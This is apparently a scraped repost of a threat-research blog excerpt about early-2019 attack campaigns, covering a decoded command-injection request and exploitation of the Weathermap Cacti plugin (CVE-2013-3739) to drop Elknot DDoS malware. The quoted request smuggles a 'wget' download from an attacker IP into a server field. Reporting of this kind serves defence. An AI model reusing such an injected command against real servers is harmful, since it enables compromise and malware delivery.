Vulnerabilities, Exploits, and Malware Driving Attack Campaigns in January 2019
- by nlqip
After the vulnerable server decodes the string, it is instructed to download a malicious file. The malicious request after decoding is:
oProxyCommand= wget http://185.29.8.28/down.php&port=143&user=sdf&passwd=sadf&server_type=imap&f_submit=Submit.
Again, in this case the threat actor took down the malicious file download.php before the researchers could download it to analyze.
Weathermap Editor (cacti plugin) Arbitrary Code Execution (CVE-2013-3739)
Another known threat actor was detected trying to exploit the PHP Weathermap Editor Cacti plugin. This vulnerability was first disclosed in April 2013. The threat actor attacks the vulnerability in PHP Weathermap and tries to download and execute a variant of Elknot/BillGates malware. Elknot is an infamous DDoS botnet family that runs on Linux and Windows systems. This malware, first detected in 2014, is used to launch DDoS attacks and seems to be spreading again. The attack vectors available within the malware include: ICMP flood, TCP flood, UDP flood, SYN flood, HTTP flood (Layer7), and DNS reflection floods. As we can see in Figure 8, 33 engines on VirusTotal.com detected this file as malicious.
Source link
lol
After the vulnerable server decodes the string, it is instructed to download a malicious file. The malicious request after decoding is: oProxyCommand= wget http://185.29.8.28/down.php&port=143&user=sdf&passwd=sadf&server_type=imap&f_submit=Submit. Again, in this case the threat actor took down the malicious file download.php before the researchers could download it to analyze. Weathermap Editor (cacti plugin) Arbitrary Code Execution (CVE-2013-3739) Another known…
Recent Posts
- Arm To Seek Retrial In Qualcomm Case After Mixed Verdict
- Jury Sides With Qualcomm Over Arm In Case Related To Snapdragon X PC Chips
- Equinix Makes Dell AI Factory With Nvidia Available Through Partners
- AMD’s EPYC CPU Boss Seeks To Push Into SMB, Midmarket With Partners
- Fortinet Releases Security Updates for FortiManager | CISA